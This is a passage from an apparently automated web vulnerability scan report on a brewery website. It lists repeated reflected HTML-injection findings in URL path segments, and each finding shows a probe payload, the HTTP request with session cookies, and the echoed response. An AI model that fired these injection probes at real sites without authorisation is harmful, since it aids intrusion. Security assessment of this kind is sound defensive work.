This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content4c9a9"><a>41638d41753/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content4c9a9"><a>41638d41753_page" class="content4c9a9">
...[SNIP]...

1.251. http://www.ninkasibrewing.com/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab306"><a>4a7c751f450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentab306"><a>4a7c751f450/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentab306"><a>4a7c751f450_page" class="contentab306">
...[SNIP]...

1.252. http://www.ninkasibrewing.com/content/js/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d322"><a>02b1c89f5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1d322"><a>02b1c89f5f6/js/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1d322"><a>02b1c89f5f6_page" class="content1d322">
...[SNIP]...

1.253. http://www.ninkasibrewing.com/content/js/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f630"><a>d1f857ac5af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content5f630"><a>d1f857ac5af/js/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content5f630"><a>d1f857ac5af_page" class="content5f630">
...[SNIP]...

1.254. http://www.ninkasibrewing.com/content/js/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff1c"><a>27664a239f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentcff1c"><a>27664a239f7/js/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentcff1c"><a>27664a239f7_page" class="contentcff1c">
...[SNIP]...

1.255. http://www.ninkasibrewing.com/content/js/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21677"><a>0ffcc0b4ab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content21677"><a>0ffcc0b4ab4/js/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content21677"><a>0ffcc0b4ab4_page" class="content21677">
...[SNIP]...

1.256. http://www.ninkasibrewing.com/content/js/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 703df"><a>def2f74c18c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content703df"><a>def2f74c18c/js/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content703df"><a>def2f74c18c_page" class="content703df">
...[SNIP]...

1.257. http://www.ninkasibrewing.com/content/js/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75f69"><a>6334a4eb341 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content75f69"><a>6334a4eb341/js/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content75f69"><a>6334a4eb341_page" class="content75f69">
...[SNIP]...

1.258. http://www.ninkasibrewing.com/dock_sales/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105ab"><a>d599d76d4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales105ab"><a>d599d76d4e6/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales105ab"><a>d599d76d4e6_page" class="dock_sales105ab">
...[SNIP]...

1.259. http://www.ninkasibrewing.com/dock_sales/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd31"><a>f3a63f771b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales6fd31"><a>f3a63f771b0/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales6fd31"><a>f3a63f771b0_page" class="dock_sales6fd31">
...[SNIP]...

1.260. http://www.ninkasibrewing.com/dock_sales/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6149e"><a>8921298afbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales6149e"><a>8921298afbf/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales6149e"><a>8921298afbf_page" class="dock_sales6149e">
...[SNIP]...

1.261. http://www.ninkasibrewing.com/dock_sales/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d6e"><a>dd2ead7ff0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_salesa1d6e"><a>dd2ead7ff0c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_salesa1d6e"><a>dd2ead7ff0c_page" class="dock_salesa1d6e">
...[SNIP]...

1.262. http://www.ninkasibrewing.com/dock_sales/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8fe0"><a>4f3395768f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_salesa8fe0"><a>4f3395768f5/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_salesa8fe0"><a>4f3395768f5_page" class="dock_salesa8fe0">
...[SNIP]...

1.263. http://www.ninkasibrewing.com/dock_sales/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f54"><a>08505ab97bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales62f54"><a>08505ab97bb/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales62f54"><a>08505ab97bb_page" class="dock_sales62f54">
...[SNIP]...

1.264. http://www.ninkasibrewing.com/dock_sales/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /dock_sales/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d7cc"><a>edb42030abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dock_sales2d7cc"><a>edb42030abb/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="dock_sales2d7cc"><a>edb42030abb_page" class="dock_sales2d7cc">
...[SNIP]...

1.265. http://www.ninkasibrewing.com/etc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac883"><a>11e27ca78ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcac883"><a>11e27ca78ba/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etcac883"><a>11e27ca78ba_page" class="etcac883">
...[SNIP]...

1.266. http://www.ninkasibrewing.com/etc/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d715"><a>980bc464eba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc6d715"><a>980bc464eba/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etc6d715"><a>980bc464eba_page" class="etc6d715">
...[SNIP]...

1.267. http://www.ninkasibrewing.com/etc/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a18"><a>2377f254faf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc92a18"><a>2377f254faf/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etc92a18"><a>2377f254faf_page" class="etc92a18">
...[SNIP]...

1.268. http://www.ninkasibrewing.com/etc/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e31"><a>0c94de8f97e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

